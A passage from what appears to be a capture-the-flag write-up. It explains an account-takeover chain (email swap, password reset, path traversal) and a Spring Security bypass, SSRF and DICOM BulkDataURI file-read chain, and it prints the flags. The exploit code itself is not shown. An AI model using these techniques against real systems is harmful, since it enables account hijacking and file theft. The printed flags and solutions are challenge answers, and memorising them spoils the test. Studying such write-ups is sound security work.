The core vulnerability of this problem lies in the hidden Email Change API. Using keyword analysis of email and role change APIs from requests like /api/auth/secure/users/redacted, /api/auth/secure/users/email endpoint is identified. The email change API accepts requests encrypted by AES-GCM, allowing changing an arbitrary user's email based on the request body containing userId and companyId.
First, analyze the frontend's encryption logic. The key for AES-256-GCM encryption is derived using PBKDF2-SHA256, and AAD (Additional Authenticated Data) includes request method, path, and user ID.
The email swap attack procedure is as follows.
Change your own email to a temporary address: Detach the existing email.
Change contract_ops@enki.co.kr email to your own registered email: The internal staff account's email is set to the attacker's email.
STEP 5. Resetting the Password of the internal_ops Account
Now that the internal staff account's email is set to the attacker's email, the password reset feature can be used. An OTP verified reset request issues a resetToken, allowing the setting of a new password.
STEP 6. Logging into the internal_ops Account
Login to the internal staff account with the reset password. An OTP is required for login, which succeeds as the attacker's OTP key is already registered.
STEP 7. Gathering internal_admin Information
Accessing the audit logs API with internal staff privileges reveals the target_id of the internal admin account.
STEPs 8~9. Hijacking the internal_admin Account
Repeat the same email swap and password reset procedures on the internal_admin account as in Steps 4~5. However, email changes can only be performed from a collaborative account with admin privileges, thus, requests must be made using the token from the initially registered account. Note the rate limiting that requires a 60-second wait.
STEP 10. Logging into internal_admin
Log into the internal_admin account to obtain token and userKeySeed.
STEP 11. Obtaining the Flag — File Download
Use the file download API /api/contracts/attachments/download, which only functions under internal admin privileges, to read the flag file. Since the API applies specific string filtering techniques, bypass this by applying Path Traversal to access /flag.txt.
Finally, the flag ENKI{6fab7762f935fe71629b482c285c7691} can be obtained.
Comprehensive Evaluation
This problem focuses more on business logic vulnerabilities (account hijacking via email swap) than on technical vulnerabilities (Path Traversal, CAPTCHA bypass). Though multi-factor authentication (OTP) and client-side encryption (AES-GCM) are implemented, it demonstrates that a single logical flaw, such as the absence of authorization check on the Email Change API, can undermine the entire authentication framework. It provides the lesson that encryption communication or MFA should not solely determine security; each API's business logic must undergo permission verification.
sfa
A medical robot Sales Force Automation system.
Vulnerability Classification
Spring Security method security bypass (CVE-2025-41248), SSRF (Server-Side Request Forgery), Local File Inclusion (LFI) using DICOM BulkDataURI
Author's Intent
This question was designed to assess the ability to construct an attack chain by combining framework-level security vulnerabilities that can be found in Java/Spring-based enterprise applications and parsing vulnerabilities of the DICOM format, which is specialized for the medical domain.
Spring Security Method Security Bypass (CVE-2025-41248): Identifies method security application omissions occurring in Java generics and inheritance structures, and evaluates whether it is possible to access administrator functions with general user permissions.
Access to internal functions via SSRF: Performs SSRF using CSS during the
wkhtmltoimagerendering process and evaluates whether it is possible to bypass loopback protection through URL parser confusion.Parsing vulnerability of DICOM JSON Model DataFragment: Analyzes the differences in
BulkDataURIhandling of dcm4che to find aDataFragmentpath with no security hooks applied and verifies whether local files can be read using it.
Solution
1. Understanding the Service Structure
Analyzing the provided source code (Docker configuration), the following configuration can be confirmed.
Spring Boot Web Application (port 3000): Medical Robot Sales Force Automation (SFA) System
wkhtmltoimage: Rendering tool for converting HTML to images (operates on Xvfb)
A function to convert DICOM JSON into
.dcmfilesThe flag is located at
/tmp/flagin the container (70 bytes)
Key features include login, exporting images (/file/export_card), and converting DICOM files (/file/convert_medical).
2. Step 1 — CVE-2025-41248: Spring Security Method Security Bypass
The /file/export_card controller only checks for login status and relies on @PreAuthorize("hasRole('ADMIN')") in the service method for real administrator restriction. The type hierarchy of the issue is as follows.
Here, convertToImage() only has a security annotation on the top-level interface, and the actual implementation inherits it indirectly through a generic inheritance structure. CVE-2025-41248 indicates that due to this parameterized type hierarchy, Spring Security's annotation detection may not function correctly, leading to a method security lapse.
As a result, even an account like user1 with ROLE_USER can call the export_card function, which was originally meant only for administrators.
3. Step 2 — SSRF: Loopback Bypass
The export_card API uses wkhtmltoimage to render HTML into images. In this process, the @import url(...) statement in CSS is processed, allowing server-side requests to arbitrary URLs.
The application attempts to block loopback addresses like localhost and 127.0.0.1 through a sanitizer, but this check assesses only direct loopback literals without strictly parsing the URL authority. Thus, it can be bypassed using the following URL parser confusion technique.
%5Bis URL encoding for[.HtmlSanitizerparses the host asexample.com, allowing it to pass the loopback block.The actual HTTP client recognizes the part before
@as userinfo and127.0.0.1:3000as the host, sending the request to the loopback.
This SSRF resets the password for the admin account.
After resetting the password, log in with the admin account.
4. Step 3 — LFI via DICOM DataFragment BulkDataURI
The /file/convert_medical endpoint accessible with admin rights converts JSON to DICOM files. It internally uses the JSONReader from the dcm4che library.
dcm4che supports the BulkDataURI field according to the DICOM JSON Model spec, and using the file:// scheme allows reading local files. However, application code registers a resolver via setBulkDataCreator() that only permits http: and https: schemes, blocking top-level BulkDataURI.
Bypass Path — DataFragment:
The DataFragment processing path in dcm4che's JSONReader directly creates new BulkData(...), bypassing the setBulkDataCreator() hook. In the DICOM JSON Model spec, DataFragment represents the structure of encapsulated pixel data.
DataFragment Structure Explanation:
DataFragment[0]= Basic Offset Table (null for single frame)DataFragment[1+]= Actual data fragments (InlineBinaryorBulkDataURI)
Using null is necessary because dcm4che's JSONReader consumes the first array element as the offset table. Without null, BulkDataURI would be mistakenly processed as the offset table.
Additionally, dcm4che's BulkData class parses offset and length query parameters from the URI. Since the flag in the problem is 70 bytes long, it must be specified as length=70 to read the entire content.
5. Executing the Exploit
The full automated exploit is as follows.
The flag ENKI{70fdfaf2d4f48c8afc9de13c4c92ea02b4afc1a1d73a13e581024546e2cee53b} can be extracted from the downloaded DICOM file.
Overall Evaluation
This task is designed not just to discover a single vulnerability but to analyze the service structure and link different types of vulnerabilities in stages to reach the final target. Initially, it involves identifying the exposed features and access control structure from general user permissions, and based on that, achieving access to administrator-only features through Spring Security method security bypass to continue to the next step.
The core intent is to link framework-level privilege bypasses, SSRF during the rendering process, and DICOM parser's DataFragment processing flaws into one chain. Just knowing individual vulnerabilities is not enough; it requires analyzing application logic, internal function calls, and library details to complete the real attack path.
Popular Articles
![](data:image/svg+xml,<svg display="block" role="presentation" viewBox="0 0 425 210" xmlns="http://www.w3.org/2000/svg"><path d="M 295.523 110.15 C 301.669 102.826 308.749 93.616 312.211 88.447 C 313.793 86.079 316.792 81.9 318.31 79.958 C 321.716 75.593 326.732 71.525 331.712 69.111 C 334.821 67.604 342.004 65.357 348.862 63.748 L 350.824 63.285 L 350.935 58.135 C 351.037 53.372 351.12 52.05 351.583 47.158 C 351.759 45.355 352.184 43.395 352.462 43.117 C 352.555 43.025 353.027 43.09 353.628 43.275 C 355.85 43.968 358.247 43.025 359.45 40.963 C 359.996 40.029 360.19 38.42 359.885 37.467 C 359.302 35.683 357.247 34.592 355.313 35.035 C 353.786 35.387 352.934 34.638 352.61 32.668 C 352.487 31.916 352.107 31.358 351.472 30.994 C 348.556 29.321 345.437 26.066 344.188 23.412 C 343.586 22.126 343.114 20.453 343.114 19.602 C 343.114 19.075 343.068 19.019 342.605 19.019 C 342.328 19.019 341.976 18.973 341.837 18.918 C 341.67 18.853 341.328 19.158 340.874 19.759 C 340.486 20.277 339.32 21.683 338.274 22.903 C 335.377 26.269 333.165 29.839 331.767 33.399 C 331.036 35.248 330.823 36.46 331.11 36.996 C 331.221 37.199 331.702 37.56 332.174 37.81 C 332.656 38.05 333.118 38.401 333.22 38.586 C 333.489 39.086 333.452 40.158 333.081 42.748 C 332.202 48.767 332.48 50.635 334.368 51.495 C 335.738 52.115 340.763 51.8 343.447 50.931 C 344.068 50.728 344.595 50.608 344.651 50.654 C 344.762 50.765 344.068 51.283 340.856 53.437 L 338.385 55.102 L 338.385 57.719 L 338.366 60.336 L 338.949 60.215 C 344.956 59.013 350.75 58.551 350.491 59.309 C 350.454 59.42 349.75 59.55 348.769 59.614 C 345.558 59.827 338.07 61.667 335.858 62.786 C 335.164 63.137 335.081 63.369 334.849 65.412 C 334.766 66.133 334.664 66.392 334.442 66.439 C 334.229 66.476 334.081 66.3 333.933 65.782 C 333.683 64.931 333.951 62.333 334.34 61.954 C 334.479 61.824 335.145 61.473 335.812 61.186 L 337.043 60.668 L 336.996 57.885 C 336.969 56.35 336.895 54.704 336.821 54.214 C 336.691 53.354 336.682 53.335 336.117 53.382 C 335.803 53.409 335.081 53.308 334.535 53.141 C 333.267 52.781 332.036 51.597 331.601 50.321 C 331.203 49.137 331.221 46.668 331.675 43.136 C 332.202 39.021 332.221 39.28 331.323 38.781 C 329.389 37.708 329.407 35.951 331.378 31.79 C 332.35 29.737 333.128 28.507 336.154 24.207 C 339.375 19.621 340.032 18.65 339.94 18.585 C 339.903 18.557 339.357 18.344 338.736 18.113 C 335.136 16.791 332.822 13.286 333.424 10.059 C 333.766 8.191 335.312 5.5 336.904 3.974 C 338.681 2.273 341.513 0.784 344.114 0.192 C 345.613 -0.15 348.094 -0.02 349.362 0.461 C 350.685 0.969 351.824 1.996 352.314 3.124 C 352.694 4.002 352.712 4.021 353.267 3.882 C 353.582 3.808 354.943 3.752 356.303 3.762 C 359.145 3.789 360.764 4.132 362.837 5.14 C 366.475 6.924 369.659 10.706 370.455 14.202 C 370.769 15.57 371.102 16.014 372.639 17.05 C 376.045 19.343 379.33 24.105 380.552 28.535 C 381.931 33.528 381.431 38.438 379.238 41.629 L 378.803 42.267 L 379.608 43.413 C 380.765 45.078 382.412 48.601 383.116 50.95 C 384.143 54.362 384.532 57.053 384.541 60.918 C 384.56 65.486 384.069 68.584 382.681 72.828 C 379.034 83.962 369.668 89.704 361.005 86.126 C 360.172 85.784 359.043 85.192 358.497 84.822 C 356.507 83.472 354.489 80.698 353.249 77.628 C 352.24 75.14 351.352 70.498 351.148 66.688 C 351.055 64.904 351.009 64.709 350.704 64.709 C 349.769 64.709 338.959 67.715 335.821 68.843 C 330.842 70.637 326.001 73.762 322.169 77.637 L 320.689 79.135 L 321.54 80.439 C 324.002 84.202 325.187 88.974 325.177 95.132 C 325.177 97.546 325.085 98.794 324.807 100.339 C 324.381 102.724 324.132 103.64 323.882 103.788 C 323.511 104.01 323.511 103.704 323.882 101.92 C 325.048 96.307 324.178 89.011 321.716 83.675 C 321.087 82.316 319.902 80.393 319.698 80.402 C 319.633 80.402 319.319 80.762 318.986 81.206 C 317.236 83.592 313.766 88.456 312.831 89.834 C 310.036 93.986 302.344 103.612 296.347 110.473 C 295.412 111.537 293.598 113.682 292.302 115.236 C 286.083 122.717 285.352 123.512 284.833 123.345 C 284.222 123.151 284.491 122.032 285.731 119.563 C 287.369 116.299 287.564 116.086 288.397 116.604 C 288.711 116.798 288.822 116.771 289.1 116.438 C 289.433 116.04 289.424 116.022 288.378 113.627 C 286.083 108.384 281.335 97 281.335 96.723 C 281.335 96.667 281.409 96.63 281.511 96.63 C 281.807 96.63 285.972 105.665 290.285 115.652 L 290.535 116.234 L 292.164 114.237 C 293.061 113.137 294.588 111.287 295.57 110.122 Z M 340.31 29.108 C 341.43 27.629 341.532 27.157 340.791 26.769 C 340.507 26.621 340.165 26.716 339.764 27.055 C 339.107 27.61 338.598 29.09 338.875 29.617 C 339.162 30.153 339.634 29.987 340.31 29.108 Z M 275.421 37.689 C 275.596 37.68 277.873 38.272 280.502 39.012 C 283.13 39.751 289.119 41.388 293.83 42.664 C 300.419 44.44 308.425 46.826 308.962 47.168 C 308.99 47.186 308.259 50.127 307.333 53.715 C 306.408 57.293 305.103 62.61 304.418 65.523 C 303.742 68.436 302.928 71.904 302.604 73.245 C 302.15 75.168 301.974 75.649 301.761 75.584 C 301.391 75.464 292.562 73.91 286.666 72.93 C 283.945 72.477 281.696 72.089 281.668 72.061 C 281.64 72.033 281.779 71.645 281.973 71.192 C 282.464 70.063 282.575 69.157 282.297 68.63 C 281.927 67.927 281.687 68.011 281.585 68.898 C 281.474 69.86 280.076 72.782 278.169 76.046 C 276.392 79.079 276.272 79.385 276.605 79.875 C 276.753 80.087 277.031 80.263 277.225 80.263 C 277.475 80.263 277.688 80.503 277.966 81.105 C 278.327 81.881 278.355 82.205 278.355 85.599 C 278.355 89.427 278.456 89.899 279.067 88.743 C 279.419 88.077 279.919 83.851 279.808 82.547 C 279.706 81.4 279.151 80.032 278.521 79.375 L 278.068 78.894 L 279.428 76.305 L 280.789 73.716 L 281.344 74.132 C 281.649 74.363 282.445 74.927 283.14 75.408 C 283.824 75.889 284.824 76.62 285.379 77.045 L 286.388 77.822 L 285.944 78.488 C 285.592 79.015 285.49 79.431 285.435 80.54 C 285.25 84.249 282.584 89.63 279.678 92.127 C 279.197 92.534 278.817 92.987 278.827 93.135 C 278.854 93.597 279.789 94.975 280.122 95.04 C 280.705 95.151 280.817 94.809 280.428 94.069 L 280.067 93.366 L 281.048 92.321 C 281.585 91.748 282.575 90.453 283.251 89.445 C 285.018 86.782 285.851 84.415 286.157 81.132 C 286.259 80.023 286.407 79.616 287.027 78.571 C 287.443 77.887 288.054 76.823 288.415 76.185 L 289.063 75.029 L 290.96 75.353 C 292.006 75.529 294.764 76.028 297.097 76.453 C 302.215 77.387 302.548 77.433 302.779 77.276 C 302.872 77.212 303.057 76.721 303.177 76.185 C 303.298 75.649 304.492 70.702 305.843 65.163 C 309.295 50.94 310.1 47.436 310.036 46.761 L 309.98 46.16 L 307.861 45.559 C 306.694 45.226 304.668 44.606 303.363 44.172 C 302.058 43.737 298.466 42.664 295.412 41.777 C 282.029 37.902 276.92 36.672 275.634 37.005 C 275.124 37.135 274.93 37.717 275.402 37.689 Z M 276.068 72.218 L 277.281 72.588 L 276.004 74.243 C 272.848 78.34 272.385 78.996 271.756 80.328 C 270.284 83.453 269.923 85.377 269.951 89.852 C 269.978 94.282 270.376 97.731 270.811 97.296 C 270.858 97.25 270.895 95.465 270.886 93.311 C 270.867 88.724 271.182 85.839 271.95 83.555 C 272.792 81.031 273.486 79.81 275.661 77.064 C 277.013 75.353 280.77 68.898 280.77 68.297 C 280.77 68.066 280.705 67.89 280.631 67.89 C 280.557 67.89 279.984 68.63 279.373 69.527 L 278.253 71.164 L 276.143 70.757 C 274.986 70.535 272.505 70.147 270.654 69.897 C 268.803 69.647 267.248 69.416 267.22 69.388 C 267.193 69.361 267.415 68.51 267.72 67.502 C 269.516 61.482 274.958 40.14 274.958 39.113 C 274.958 38.633 274.625 38.707 274.421 39.234 C 274.143 39.946 272.949 44.051 272.052 47.334 C 271.598 48.98 270.802 51.763 270.284 53.511 C 269.756 55.259 268.97 58.079 268.516 59.771 C 268.072 61.464 267.267 64.173 266.739 65.782 C 266.212 67.391 265.777 68.88 265.777 69.093 C 265.777 69.601 265.795 69.61 270.719 70.822 C 272.996 71.386 275.411 72.005 276.078 72.209 Z M 336.858 43.376 C 336.062 42.738 335.691 42.84 335.691 43.681 C 335.691 44.162 335.83 44.431 336.312 44.884 C 337.95 46.428 340.032 45.781 341.263 43.367 C 341.707 42.507 341.828 41.943 341.578 41.971 C 341.504 41.98 341.143 42.063 340.773 42.146 C 340.347 42.248 339.838 42.59 339.338 43.099 C 338.403 44.07 337.811 44.135 336.858 43.376 Z M 374.712 88.197 C 374.712 88.438 375.517 89.908 377.146 92.682 C 388.549 111.999 399.72 133.046 405.616 146.315 C 406.421 148.128 406.893 148.978 407.106 149.025 C 407.374 149.08 407.402 149.015 407.3 148.608 C 407.022 147.527 405.745 144.549 402.423 137.225 C 395.601 122.217 394.713 120.479 385.855 104.934 C 381.913 98.018 376.73 89.714 375.517 88.382 C 375.128 87.957 374.693 87.855 374.693 88.188 Z M 381.043 144.336 C 391.742 161.111 400.229 174.889 400.044 175.175 C 399.988 175.268 399.877 175.333 399.766 175.333 C 399.452 175.333 389.863 160.583 380.672 145.955 C 377.803 141.386 375.091 137.087 374.638 136.384 L 373.814 135.108 L 373.074 135.579 C 372.213 136.125 366.345 139.056 365.744 139.241 C 365.475 139.324 365.336 139.5 365.336 139.759 C 365.336 140.129 365.799 142.921 367.169 150.855 C 367.521 152.862 367.808 154.804 367.808 155.146 C 367.808 156.062 367.373 156.959 366.762 157.31 L 366.253 157.597 L 367.169 158.651 C 370.871 162.914 374.268 169.22 376.48 175.906 C 377.776 179.827 378.266 182.444 378.331 185.782 L 378.386 188.556 L 379.303 190.637 C 379.802 191.783 380.996 194.428 381.94 196.508 C 383.523 200.004 386.522 207.448 386.799 208.557 C 386.864 208.826 386.985 209.075 387.077 209.131 C 387.401 209.334 387.234 209.889 386.827 209.945 C 386.614 209.972 380.349 209.982 372.907 209.954 L 359.385 209.908 L 358.747 207.485 C 358.395 206.144 357.867 203.878 357.562 202.417 C 357.266 200.966 356.655 198.154 356.229 196.194 C 355.526 193.004 355.442 192.384 355.442 190.359 C 355.442 187.113 354.702 181.639 353.85 178.504 C 352.832 174.778 350.185 169.239 349.602 169.609 C 349.343 169.766 349.547 170.515 350.343 172.383 C 352.638 177.737 353.36 182 353.304 189.795 C 353.286 192.791 353.341 193.79 353.665 195.621 C 354.221 198.811 354.915 201.372 356.423 205.857 C 357.155 208.03 357.728 209.824 357.71 209.834 C 357.682 209.852 349.491 209.889 339.477 209.926 L 321.29 210 L 320.466 206.292 C 318.421 197.137 317.866 191.543 317.856 180.002 C 317.856 173.844 318.051 170.099 318.504 167.916 C 318.902 165.975 318.902 165.938 318.328 165.78 C 317.06 165.438 316.588 164.301 317.051 162.692 C 317.218 162.128 317.551 161.305 317.792 160.889 L 318.227 160.13 L 317.847 157.273 C 317.366 153.62 316.44 147.397 316.366 147.323 C 316.339 147.295 315.626 147.425 314.774 147.619 C 313.923 147.813 312.97 147.97 312.627 147.97 C 312.063 147.97 312.016 147.924 311.989 147.397 C 311.97 147.083 311.914 142.82 311.859 137.928 L 311.757 129.032 L 310.443 130.604 C 309.721 131.474 307.898 133.406 306.389 134.923 C 299.957 141.377 295.69 143.754 290.007 144.031 C 286.934 144.179 285.018 143.67 282.445 142.006 C 279.215 139.916 276.541 136.698 274.273 132.167 C 272.283 128.182 270.432 121.986 269.034 114.607 C 268.34 110.936 267.526 104.712 267.526 103.048 L 267.526 101.55 L 268.266 100.736 C 269.349 99.553 270.913 98.498 273.209 97.398 C 275.68 96.214 277.623 95.687 279.28 95.761 C 280.039 95.798 280.493 95.891 280.539 96.029 C 280.594 96.177 280.437 96.251 280.085 96.251 C 279.789 96.251 278.938 96.372 278.179 96.51 C 276.041 96.917 272.079 98.933 269.969 100.69 C 268.498 101.911 268.451 102.058 268.896 103.945 C 269.099 104.805 269.553 107.228 269.904 109.308 C 272.514 124.779 275.522 132.888 280.585 138.141 C 284.685 142.394 288.147 143.439 293.515 142.061 C 297.717 140.98 301.317 138.548 306.741 133.138 C 310.434 129.448 312.424 126.989 315.7 122.051 C 317.653 119.101 320.031 114.783 320.744 112.896 C 321.012 112.193 321.29 111.611 321.373 111.611 C 321.605 111.611 321.549 113.127 321.272 114.755 C 320.291 120.405 317.153 127.248 313.941 130.752 L 312.97 131.806 L 313.275 137.013 C 313.442 139.87 313.59 143.079 313.59 144.124 C 313.59 145.853 313.627 146.019 313.904 145.936 C 314.071 145.881 315.006 145.677 315.978 145.483 C 321.392 144.383 334.34 140.249 349.445 134.803 C 358.821 131.418 367.835 128.339 370.584 127.59 C 373.268 126.85 375.591 126.434 377.017 126.434 C 377.581 126.434 378.062 126.378 378.062 126.314 C 378.062 126.249 377.757 125.87 377.387 125.481 C 376.285 124.335 374.064 121.403 372.491 119.027 C 367.835 111.962 364.429 103.871 362.995 96.51 C 362.523 94.06 362.069 89.917 362.227 89.492 C 362.319 89.251 362.384 89.26 362.884 89.51 C 363.263 89.704 363.569 90.074 363.846 90.694 C 364.327 91.757 365.614 95.937 365.901 97.398 C 366.086 98.332 366.077 98.452 365.753 98.767 C 365.29 99.22 364.763 98.979 364.457 98.175 C 364.281 97.712 364.216 97.657 364.161 97.907 C 364.078 98.258 364.642 100.2 365.651 103.057 C 368.539 111.213 373.796 120.044 378.969 125.463 C 380.049 126.591 380.614 127.507 380.663 128.209 C 380.728 129.106 380.682 129.374 380.284 130.04 C 379.719 131.011 378.636 131.964 376.535 133.369 C 375.489 134.063 374.925 134.553 374.971 134.71 C 375.017 134.839 377.738 139.167 381.024 144.318 Z M 363.504 136.439 C 363.245 134.59 362.995 132.833 362.939 132.518 C 362.884 132.204 362.754 131.945 362.643 131.954 C 362.532 131.954 361.486 132.324 360.32 132.759 C 351.315 136.134 336.117 141.312 327.741 143.846 C 325.27 144.595 322.762 145.4 322.179 145.622 C 321.596 145.853 320.439 146.204 319.606 146.417 C 318.773 146.63 317.995 146.861 317.875 146.925 C 317.708 147.027 317.773 148.017 318.19 151.299 C 318.486 153.63 318.847 156.293 318.995 157.199 C 319.402 159.723 319.347 160.509 318.699 161.749 C 318.384 162.35 318.106 163.182 318.06 163.672 C 317.986 164.467 318.023 164.56 318.477 164.865 C 318.893 165.133 319.291 165.188 320.892 165.161 C 321.947 165.142 322.901 165.059 322.993 164.957 C 323.141 164.809 322.114 164.319 320.753 163.912 C 320.476 163.829 320.207 163.653 320.161 163.524 C 320.096 163.339 320.244 163.311 320.772 163.385 C 321.151 163.441 322.577 163.653 323.937 163.866 C 326.695 164.292 329.25 164.338 333.914 164.051 C 342.337 163.533 350.63 161.934 356.081 159.788 C 357.895 159.067 362.106 156.875 363.67 155.821 C 364.161 155.488 364.614 155.229 364.698 155.229 C 365.012 155.229 364.772 155.775 364.115 156.57 L 363.393 157.43 L 363.939 157.486 C 364.698 157.569 366.179 157.042 366.493 156.579 C 367.002 155.849 366.836 154.406 365.614 148.784 C 365.022 146.075 364.059 140.425 363.504 136.43 Z M 421.109 180.012 C 420.831 179.531 420.572 178.819 420.535 178.421 C 420.369 176.646 417.888 172.882 415.287 170.459 L 413.927 169.193 L 414.454 169.008 C 414.751 168.906 415.028 168.712 415.093 168.554 C 415.241 168.175 414.51 166.048 412.566 161.212 C 410.364 155.729 408.624 151.863 408.364 151.863 C 408.216 151.863 408.253 152.178 408.494 152.955 C 408.864 154.129 410.512 158.632 412.057 162.71 C 413.177 165.66 413.779 167.602 413.603 167.759 C 413.538 167.815 412.844 168.083 412.067 168.36 C 406.948 170.136 401.96 173.169 401.034 175.074 C 400.673 175.813 400.673 176.22 401.034 176.22 C 401.118 176.22 401.192 176.119 401.192 175.989 C 401.192 175.86 401.488 175.481 401.858 175.111 L 402.515 174.463 L 402.515 177.145 C 402.524 179.66 403.061 184.025 403.866 188.168 C 404.033 189.028 404.366 189.36 404.635 188.926 C 404.736 188.769 404.135 181.833 403.922 180.613 C 403.857 180.271 403.765 178.597 403.7 176.868 L 403.589 173.733 L 405.181 172.864 C 409.086 170.728 412.492 170.265 414.982 171.523 C 416.75 172.42 419.702 176.821 419.841 178.745 C 419.878 179.364 420.35 180.317 422.136 183.452 C 424.478 187.548 424.774 187.992 424.996 187.77 C 425.117 187.65 422.257 181.926 421.109 179.993 Z M 410.493 182.943 L 409.327 180.751 L 409.623 179.762 C 410.067 178.273 410.03 175.582 409.54 173.973 C 409.16 172.725 408.864 172.272 408.725 172.725 C 408.688 172.854 408.522 173.622 408.355 174.454 C 407.966 176.433 407.578 177.256 406.55 178.356 L 405.708 179.253 L 405.606 184.043 C 405.523 188.103 405.468 188.917 405.208 189.397 C 404.81 190.137 405.144 190.359 405.745 189.749 C 406.476 189.018 406.68 187.77 406.791 183.627 C 406.865 180.77 406.948 179.734 407.143 179.429 C 407.393 179.041 407.439 179.096 408.513 181.195 C 410.78 185.606 413.501 189.962 415.695 192.717 C 416.528 193.762 416.833 194.049 416.879 193.808 C 416.916 193.623 416.13 192.255 415.01 190.544 C 412.881 187.298 412.205 186.17 410.484 182.943 Z M 417.86 178.726 C 418.61 177.903 417.962 177.996 416.741 178.893 C 416.204 179.29 414.908 180.039 413.825 180.566 C 411.78 181.584 410.919 182.185 411.826 181.972 C 412.289 181.861 412.335 181.935 413.622 184.478 C 414.343 185.911 415.389 187.881 415.935 188.833 C 417.074 190.831 419.795 194.955 420.184 195.269 C 420.443 195.482 420.804 195.399 420.804 195.112 C 420.804 195.029 420.072 193.855 419.184 192.514 C 418.295 191.173 417.157 189.388 416.657 188.574 C 415.454 186.596 412.789 181.695 412.872 181.621 C 412.909 181.584 413.39 181.352 413.936 181.112 L 414.936 180.668 L 415.51 181.926 C 415.824 182.619 417.055 185.208 418.258 187.696 C 419.462 190.183 420.6 192.736 420.822 193.383 C 421.229 194.622 421.507 194.77 421.507 193.753 C 421.507 192.8 420.526 190.489 417.907 185.245 C 416.574 182.582 415.51 180.391 415.537 180.363 C 415.565 180.335 415.954 180.076 416.389 179.78 L 417.194 179.244 L 417.666 180.603 C 417.925 181.352 418.721 183.313 419.443 184.95 C 420.165 186.586 421.137 188.917 421.618 190.1 C 422.118 191.349 422.581 192.264 422.71 192.264 C 423.303 192.264 422.322 189.194 420.193 184.413 C 419.647 183.174 419.702 183.23 421.155 185.264 C 422.794 187.557 424.126 189.129 424.256 188.917 C 424.395 188.695 418.675 180.002 418.027 179.448 C 417.583 179.068 417.583 179.041 417.87 178.717 Z M 67.546 37.319 C 67.434 37.135 67.888 36.265 68.351 35.766 C 68.86 35.23 70.591 34.351 71.386 34.231 C 71.757 34.175 72.099 34.101 72.136 34.065 C 72.173 34.028 72.044 33.51 71.849 32.89 C 71.174 30.717 71.47 28.267 72.701 25.918 C 73.95 23.532 76.912 21.109 79.79 20.111 C 80.836 19.75 83.02 19.63 84.325 19.861 L 85.066 19.99 L 85.279 18.733 C 85.871 15.256 89.148 11.613 93.664 9.412 C 95.571 8.478 96.978 8.015 98.523 7.803 C 100.217 7.572 102.207 7.877 103.54 8.552 C 104.447 9.014 106.011 10.512 106.548 11.428 C 108.149 14.165 108.177 17.864 106.612 20.934 L 106.261 21.618 L 107.047 22.432 C 108.038 23.449 108.954 24.817 110.463 27.508 C 113.378 32.733 114.905 34.379 118.82 36.533 C 120.727 37.588 121.662 38.438 121.662 39.141 C 121.662 39.714 121.439 40.094 120.32 41.416 L 119.561 42.313 L 120.875 45.827 C 123.189 52.022 123.485 53.021 123.503 54.824 C 123.513 56.091 123.448 56.572 123.142 57.229 C 122.596 58.412 121.643 59.383 119.912 60.52 C 119.079 61.066 118.357 61.538 118.32 61.565 C 118.024 61.778 120.56 66.827 121.143 67.188 C 121.227 67.243 122.208 66.956 123.3 66.559 C 127.807 64.913 131.417 64.312 133.397 64.876 C 134.915 65.31 135.813 65.893 137.516 67.521 C 139.265 69.204 140.829 71.192 144.272 76.111 C 149.372 83.398 150.742 85.71 154.768 93.829 C 157.943 100.218 159.035 102.706 163.088 112.711 C 164.579 116.401 165.911 119.637 166.032 119.915 L 166.263 120.414 L 166.883 119.776 C 167.605 119.036 168.16 118.962 168.549 119.563 C 168.929 120.146 169.021 125.278 168.66 125.722 C 168.234 126.23 167.327 126.092 166.735 125.426 C 165.56 124.085 164.403 121.635 160.414 111.981 C 155.99 101.291 153.824 96.464 150.936 90.916 C 148.113 85.488 147.253 84.091 142.616 77.332 C 138.256 70.997 136.729 69.111 134.675 67.558 C 134.054 67.086 133.971 67.067 133.545 67.289 C 132.49 67.844 130.787 70.702 129.816 73.54 C 127.122 81.41 126.123 92.747 127.465 100.144 C 127.687 101.393 127.724 101.855 127.576 101.855 C 127.465 101.855 127.243 101.254 127.076 100.496 C 125.345 92.469 126.021 80.522 128.668 72.569 C 129.381 70.415 130.482 67.992 131.121 67.151 L 131.565 66.568 L 131.037 66.568 C 130.26 66.568 127.946 67.04 126.16 67.558 C 124.438 68.066 116.802 70.803 114.942 71.589 C 112.434 72.643 106.344 75.445 103.956 76.638 C 98.255 79.496 87.121 85.996 86.343 86.93 C 86.065 87.263 85.797 87.291 85.797 86.986 C 85.797 86.274 89.222 83.795 96.126 79.486 C 97.292 78.756 98.273 78.145 98.301 78.118 C 98.375 78.053 96.903 73.291 95.774 69.925 C 95.339 68.621 94.997 67.548 95.025 67.539 C 95.052 67.53 95.404 67.299 95.811 67.049 L 96.552 66.577 L 96.922 67.844 C 97.422 69.536 99.791 77.064 99.847 77.138 C 99.865 77.165 101.226 76.453 102.873 75.556 C 106.02 73.836 110.009 71.876 112.369 70.896 C 113.147 70.572 114.378 70.036 115.109 69.694 C 115.84 69.351 117.126 68.815 117.978 68.501 C 118.829 68.186 119.514 67.844 119.514 67.733 C 119.514 67.622 119.042 66.707 118.468 65.69 L 117.432 63.84 L 115.858 63.738 C 113.656 63.591 112.795 63.415 112.665 63.082 C 112.601 62.925 112.647 62.768 112.767 62.731 C 112.878 62.694 113.082 62.555 113.211 62.435 C 113.341 62.305 114.433 61.713 115.627 61.112 C 120.523 58.671 121.967 57.265 121.976 54.935 C 121.976 53.733 121.708 52.781 119.773 47.353 C 118.931 44.967 118.2 42.785 118.145 42.489 C 118.07 42.017 118.2 41.795 119.218 40.658 C 119.857 39.955 120.384 39.298 120.384 39.206 C 120.384 38.993 119.468 38.346 117.561 37.218 C 113.72 34.952 112.129 33.205 109.361 28.211 C 107.334 24.558 106.159 22.811 105.715 22.811 C 105.65 22.811 105.354 23.181 105.057 23.643 C 104.012 25.271 100.967 27.989 99.291 28.803 L 98.551 29.164 L 98.967 29.996 C 99.754 31.549 99.467 33.63 98.292 34.897 L 97.579 35.673 L 98.477 36.977 C 98.977 37.699 99.782 38.688 100.291 39.187 C 100.93 39.816 101.17 40.177 101.087 40.38 C 101.004 40.584 100.874 40.63 100.661 40.537 C 100.485 40.464 99.828 40.371 99.18 40.325 C 98.033 40.251 97.986 40.26 97.264 40.917 C 96.302 41.795 96.033 42.359 96.033 43.487 C 96.033 45.818 97.459 47.02 100.476 47.26 C 103.04 47.464 103.04 47.889 100.458 49.184 C 96.728 51.051 92.655 53.631 89.758 55.962 C 87.759 57.561 87.37 57.7 84.464 57.867 C 81.586 58.024 79.577 57.395 78.097 55.878 C 77.069 54.824 76.616 53.798 76.283 51.819 L 76.005 50.164 L 75.033 50.164 C 73.728 50.164 71.97 49.738 70.914 49.165 C 68.628 47.917 67.296 44.384 67.944 41.296 C 68.24 39.899 69.378 37.726 